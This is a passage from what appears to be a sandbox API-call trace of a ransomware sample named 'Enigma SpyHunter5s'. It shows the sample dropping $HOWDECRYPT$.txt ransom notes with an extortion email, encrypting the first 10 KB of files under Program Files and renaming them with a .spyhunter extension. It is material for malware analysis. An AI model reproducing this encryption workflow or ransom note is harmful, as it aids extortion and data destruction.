returned 295 [0179.231] WriteFile (in: hFile=0xa0, lpBuffer=0x248e30f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e438, lpOverlapped=0x0 | out: lpBuffer=0x248e30f*, lpNumberOfBytesWritten=0x248e438*=0x127, lpOverlapped=0x0) returned 1 [0179.232] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.232] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e438, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e438*=0x2ac, lpOverlapped=0x0) returned 1 [0179.232] CloseHandle (hObject=0xa0) returned 1 [0179.232] GetProcessHeap () returned 0x2c0000 [0179.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f9a0 | out: hHeap=0x2c0000) returned 1 [0179.233] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3d8 | out: pbBuffer=0x248e3d8) returned 1 [0179.233] GetProcessHeap () returned 0x2c0000 [0179.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.233] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3d0*=0x30) returned 1 [0179.233] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.233] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll") returned 77 [0179.233] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.233] GetProcessHeap () returned 0x2c0000 [0179.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.233] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e394, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e394*=0x2800, lpOverlapped=0x0) returned 1 [0179.320] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.320] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e394, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e394*=0x2800, lpOverlapped=0x0) returned 1 [0179.320] GetProcessHeap () returned 0x2c0000 [0179.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.320] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.320] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e394, lpOverlapped=0x0 | out: lpBuffer=0x248e3d4*, lpNumberOfBytesWritten=0x248e394*=0x4, lpOverlapped=0x0) returned 1 [0179.561] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e394, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e394*=0x30, lpOverlapped=0x0) returned 1 [0179.561] CloseHandle (hObject=0xa0) returned 1 [0179.561] GetProcessHeap () returned 0x2c0000 [0179.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.562] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.spyhunter") returned 87 [0179.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll.spyhunter")) returned 1 [0179.563] GetProcessHeap () returned 0x2c0000 [0179.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.563] GetProcessHeap () returned 0x2c0000 [0179.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.563] GetProcessHeap () returned 0x2c0000 [0179.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8118 | out: hHeap=0x2c0000) returned 1 [0179.563] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.564] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.564] WriteFile (in: hFile=0xa0, lpBuffer=0x248e307*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e430, lpOverlapped=0x0 | out: lpBuffer=0x248e307*, lpNumberOfBytesWritten=0x248e430*=0x127, lpOverlapped=0x0) returned 1 [0179.565] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.565] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e430, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e430*=0x2ac, lpOverlapped=0x0) returned 1 [0179.566] CloseHandle (hObject=0xa0) returned 1 [0179.566] GetProcessHeap () returned 0x2c0000 [0179.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76de8 | out: hHeap=0x2c0000) returned 1 [0179.566] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3d0 | out: pbBuffer=0x248e3d0) returned 1 [0179.566] GetProcessHeap () returned 0x2c0000 [0179.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.566] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3c8*=0x30) returned 1 [0179.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\dao360.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.566] GetProcessHeap () returned 0x2c0000 [0179.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.566] GetProcessHeap () returned 0x2c0000 [0179.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b538 | out: hHeap=0x2c0000) returned 1 [0179.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\java\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.585] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.585] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2ff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e428, lpOverlapped=0x0 | out: lpBuffer=0x248e2ff*, lpNumberOfBytesWritten=0x248e428*=0x127, lpOverlapped=0x0) returned 1 [0179.585] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.586] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e428, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e428*=0x2ac, lpOverlapped=0x0) returned 1 [0179.586] CloseHandle (hObject=0xa0) returned 1 [0179.586] GetProcessHeap () returned 0x2c0000 [0179.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf3d0 | out: hHeap=0x2c0000) returned 1 [0179.586] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.588] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.588] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2fb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x248e2fb*, lpNumberOfBytesWritten=0x248e424*=0x127, lpOverlapped=0x0) returned 1 [0179.589] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.589] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e424, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e424*=0x2ac, lpOverlapped=0x0) returned 1 [0179.590] CloseHandle (hObject=0xa0) returned 1 [0179.590] GetProcessHeap () returned 0x2c0000 [0179.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66a40 | out: hHeap=0x2c0000) returned 1 [0179.591] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3c0 | out: pbBuffer=0x248e3c0) returned 1 [0179.591] GetProcessHeap () returned 0x2c0000 [0179.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.591] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3b8*=0x30) returned 1 [0179.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task64.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.592] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml") returned 67 [0179.592] StrStrW (lpFirst="task64.xml", lpSrch=".txt") returned 0x0 [0179.592] GetProcessHeap () returned 0x2c0000 [0179.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.592] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e37c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e37c*=0x588, lpOverlapped=0x0) returned 1 [0179.593] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.594] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x588, lpNumberOfBytesWritten=0x248e37c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e37c*=0x588, lpOverlapped=0x0) returned 1 [0179.594] GetProcessHeap () returned 0x2c0000 [0179.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.594] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.594] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e37c, lpOverlapped=0x0 | out: lpBuffer=0x248e3bc*, lpNumberOfBytesWritten=0x248e37c*=0x4, lpOverlapped=0x0) returned 1 [0179.594] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e37c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e37c*=0x30, lpOverlapped=0x0) returned 1 [0179.594] CloseHandle (hObject=0xa0) returned 1 [0179.594] GetProcessHeap () returned 0x2c0000 [0179.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.594] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml.spyhunter") returned 77 [0179.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task64.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml.spyhunter" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task64.xml.spyhunter")) returned 1 [0179.595] GetProcessHeap () returned 0x2c0000 [0179.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.595] GetProcessHeap () returned 0x2c0000 [0179.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.596] GetProcessHeap () returned 0x2c0000 [0179.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03338 | out: hHeap=0x2c0000) returned 1 [0179.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3c0 | out: pbBuffer=0x248e3c0) returned 1 [0179.596] GetProcessHeap () returned 0x2c0000 [0179.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.596] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3b8*=0x30) returned 1 [0179.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml") returned 65 [0179.597] StrStrW (lpFirst="task.xml", lpSrch=".txt") returned 0x0 [0179.597] GetProcessHeap () returned 0x2c0000 [0179.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.597] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e37c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e37c*=0x583, lpOverlapped=0x0) returned 1 [0179.598] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.598] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x583, lpNumberOfBytesWritten=0x248e37c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e37c*=0x583, lpOverlapped=0x0) returned 1 [0179.598] GetProcessHeap () returned 0x2c0000 [0179.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.599] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.599] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e37c, lpOverlapped=0x0 | out: lpBuffer=0x248e3bc*, lpNumberOfBytesWritten=0x248e37c*=0x4, lpOverlapped=0x0) returned 1 [0179.599] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e37c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e37c*=0x30, lpOverlapped=0x0) returned 1 [0179.599] CloseHandle (hObject=0xa0) returned 1 [0179.599] GetProcessHeap () returned 0x2c0000 [0179.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.599] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml.spyhunter") returned 75 [0179.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml.spyhunter" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\task.xml.spyhunter")) returned 1 [0179.600] GetProcessHeap () returned 0x2c0000 [0179.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.600] GetProcessHeap () returned 0x2c0000 [0179.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.600] GetProcessHeap () returned 0x2c0000 [0179.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e030c8 | out: hHeap=0x2c0000) returned 1 [0179.600] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3b8 | out: pbBuffer=0x248e3b8) returned 1 [0179.600] GetProcessHeap () returned 0x2c0000 [0179.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.600] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3b0*=0x30) returned 1 [0179.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jusched.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.601] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe") returned 68 [0179.601] StrStrW (lpFirst="jusched.exe", lpSrch=".txt") returned 0x0 [0179.601] GetProcessHeap () returned 0x2c0000 [0179.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0179.601] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e374, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e374*=0x2800, lpOverlapped=0x0) returned 1 [0179.603] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.603] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e374, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e374*=0x2800, lpOverlapped=0x0) returned 1 [0179.604] GetProcessHeap () returned 0x2c0000 [0179.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0179.604] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.604] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e374, lpOverlapped=0x0 | out: lpBuffer=0x248e3b4*, lpNumberOfBytesWritten=0x248e374*=0x4, lpOverlapped=0x0) returned 1 [0179.741] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e374, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e374*=0x30, lpOverlapped=0x0) returned 1 [0179.741] CloseHandle (hObject=0xa0) returned 1 [0179.741] GetProcessHeap () returned 0x2c0000 [0179.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.741] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.spyhunter") returned 78 [0179.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jusched.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.spyhunter" (normalized: "c:\\program files (x86)\\common 